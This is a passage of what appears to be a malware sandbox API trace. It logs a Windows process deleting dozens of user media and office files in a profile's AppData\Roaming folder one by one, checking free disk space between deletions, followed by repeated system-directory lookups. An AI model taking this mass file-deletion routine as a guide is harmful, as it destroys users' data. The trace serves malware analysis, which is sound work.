halpmcxz\\appdata\\roaming\\apc-w2.jpg")) returned 1 [0148.002] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.008] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpvwK84ed6Sn97sXC.flv", dwFileAttributes=0x80) returned 1 [0148.008] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpvwK84ed6Sn97sXC.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bpvwk84ed6sn97sxc.flv")) returned 1 [0148.012] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.020] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\D4rwKgYr CWMXzXp.avi", dwFileAttributes=0x80) returned 1 [0148.021] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\D4rwKgYr CWMXzXp.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\d4rwkgyr cwmxzxp.avi")) returned 1 [0148.024] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.031] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Dald28xPx3iMM2_FC4n.mp4", dwFileAttributes=0x80) returned 1 [0148.032] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Dald28xPx3iMM2_FC4n.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dald28xpx3imm2_fc4n.mp4")) returned 1 [0148.036] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.045] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\epiZ-rI.mp4", dwFileAttributes=0x80) returned 1 [0148.045] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\epiZ-rI.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\epiz-ri.mp4")) returned 1 [0148.049] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.058] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gOfSeIjT2owXkxsqgSHE.mp3", dwFileAttributes=0x80) returned 1 [0148.058] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gOfSeIjT2owXkxsqgSHE.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gofseijt2owxkxsqgshe.mp3")) returned 1 [0148.061] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.070] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IDUuW.mp4", dwFileAttributes=0x80) returned 1 [0148.070] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IDUuW.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iduuw.mp4")) returned 1 [0148.074] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.081] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IzFj5.mp3", dwFileAttributes=0x80) returned 1 [0148.082] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IzFj5.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\izfj5.mp3")) returned 1 [0148.085] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.091] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\J-ILFI9.wav", dwFileAttributes=0x80) returned 1 [0148.092] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\J-ILFI9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\j-ilfi9.wav")) returned 1 [0148.095] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.102] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Jyq3z0P9F8d6n.wav", dwFileAttributes=0x80) returned 1 [0148.102] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Jyq3z0P9F8d6n.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jyq3z0p9f8d6n.wav")) returned 1 [0148.105] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.115] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\knn2E8Vl5.wav", dwFileAttributes=0x80) returned 1 [0148.115] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\knn2E8Vl5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\knn2e8vl5.wav")) returned 1 [0148.118] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.129] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KYRMK5CPIWzzF.avi", dwFileAttributes=0x80) returned 1 [0148.130] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KYRMK5CPIWzzF.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kyrmk5cpiwzzf.avi")) returned 1 [0148.133] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.165] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kZCnPzNo.docx", dwFileAttributes=0x80) returned 1 [0148.167] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kZCnPzNo.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kzcnpzno.docx")) returned 1 [0148.182] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.189] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k_09a7985v-.swf", dwFileAttributes=0x80) returned 1 [0148.190] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k_09a7985v-.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\k_09a7985v-.swf")) returned 1 [0148.193] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.200] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mb7F.flv", dwFileAttributes=0x80) returned 1 [0148.200] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mb7F.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mb7f.flv")) returned 1 [0148.261] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.271] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\n3QKGfR7Y8rQWnUu.wav", dwFileAttributes=0x80) returned 1 [0148.271] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\n3QKGfR7Y8rQWnUu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\n3qkgfr7y8rqwnuu.wav")) returned 1 [0148.275] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.284] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nCT70sYjJkMsf WZrE.mp4", dwFileAttributes=0x80) returned 1 [0148.284] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nCT70sYjJkMsf WZrE.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nct70syjjkmsf wzre.mp4")) returned 1 [0148.288] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.294] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qysC7D.png", dwFileAttributes=0x80) returned 1 [0148.294] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qysC7D.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qysc7d.png")) returned 1 [0148.335] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.343] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rWXSgpTKpir07i_.png", dwFileAttributes=0x80) returned 1 [0148.343] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rWXSgpTKpir07i_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\rwxsgptkpir07i_.png")) returned 1 [0148.347] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.353] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RZs9K32XCBkLrlBW.jpg", dwFileAttributes=0x80) returned 1 [0148.354] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RZs9K32XCBkLrlBW.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\rzs9k32xcbklrlbw.jpg")) returned 1 [0148.357] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.366] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SDPreKeyyM1Wm.mp3", dwFileAttributes=0x80) returned 1 [0148.367] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SDPreKeyyM1Wm.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\sdprekeyym1wm.mp3")) returned 1 [0148.370] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.393] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\TNhRVi.mp4", dwFileAttributes=0x80) returned 1 [0148.393] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\TNhRVi.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tnhrvi.mp4")) returned 1 [0148.396] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.406] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ty_ypfGv_l.avi", dwFileAttributes=0x80) returned 1 [0148.407] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ty_ypfGv_l.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ty_ypfgv_l.avi")) returned 1 [0148.410] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.415] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uoZBII7UTAi0gwP.pptx", dwFileAttributes=0x80) returned 1 [0148.416] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uoZBII7UTAi0gwP.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uozbii7utai0gwp.pptx")) returned 1 [0148.419] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.429] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WBw42-ssLGEuyL.mp4", dwFileAttributes=0x80) returned 1 [0148.430] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WBw42-ssLGEuyL.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wbw42-sslgeuyl.mp4")) returned 1 [0148.434] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.443] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yy53mbDWam6nSURIVxt.avi", dwFileAttributes=0x80) returned 1 [0148.444] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yy53mbDWam6nSURIVxt.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\yy53mbdwam6nsurivxt.avi")) returned 1 [0148.447] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0148.454] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zTdlZDDK57IcK.swf", dwFileAttributes=0x80) returned 1 [0148.454] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zTdlZDDK57IcK.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ztdlzddk57ick.swf")) returned 1 [0148.457] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.457] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.458] CoTaskMemFree (pv=0x4e1c10) [0148.462] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.462] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.462] CoTaskMemFree (pv=0x4e1c10) [0148.463] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.463] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.463] CoTaskMemFree (pv=0x4e1c10) [0148.464] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.464] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.464] CoTaskMemFree (pv=0x4e1c10) [0148.465] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.465] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.465] CoTaskMemFree (pv=0x4e1c10) [0148.466] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.466] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.466] CoTaskMemFree (pv=0x4e1c10) [0148.467] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.467] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.467] CoTaskMemFree (pv=0x4e1c10) [0148.468] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.468] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.468] CoTaskMemFree (pv=0x4e1c10) [0148.470] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.470] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.470] CoTaskMemFree (pv=0x4e1c10) [0148.471] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.471] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.472] CoTaskMemFree (pv=0x4e1c10) [0148.472] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.472] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.472] CoTaskMemFree (pv=0x4e1c10) [0148.474] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.474] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.474] CoTaskMemFree (pv=0x4e1c10) [0148.475] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.475] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.475] CoTaskMemFree (pv=0x4e1c10) [0148.476] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.476] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.476] CoTaskMemFree (pv=0x4e1c10) [0148.477] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.477] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.477] CoTaskMemFree (pv=0x4e1c10) [0148.478] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.478] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.478] CoTaskMemFree (pv=0x4e1c10) [0148.479] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.479] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.479] CoTaskMemFree (pv=0x4e1c10) [0148.480] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.480] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.480] CoTaskMemFree (pv=0x4e1c10) [0148.481] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.481] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.481] CoTaskMemFree (pv=0x4e1c10) [0148.481] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.481] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.482] CoTaskMemFree (pv=0x4e1c10) [0148.483] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.483] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.483] CoTaskMemFree (pv=0x4e1c10) [0148.484] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.484] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.484] CoTaskMemFree (pv=0x4e1c10) [0148.485] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.485] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.485] CoTaskMemFree (pv=0x4e1c10) [0148.485] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.486] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.486] CoTaskMemFree (pv=0x4e1c10) [0148.487] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.487] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.488] CoTaskMemFree (pv=0x4e1c10) [0148.488] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.488] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.488] CoTaskMemFree (pv=0x4e1c10) [0148.489] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.489] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.489] CoTaskMemFree (pv=0x4e1c10) [0148.490] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.490] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.491] CoTaskMemFree (pv=0x4e1c10) [0148.491] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.491] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.491] CoTaskMemFree (pv=0x4e1c10) [0148.492] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.492] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.492] 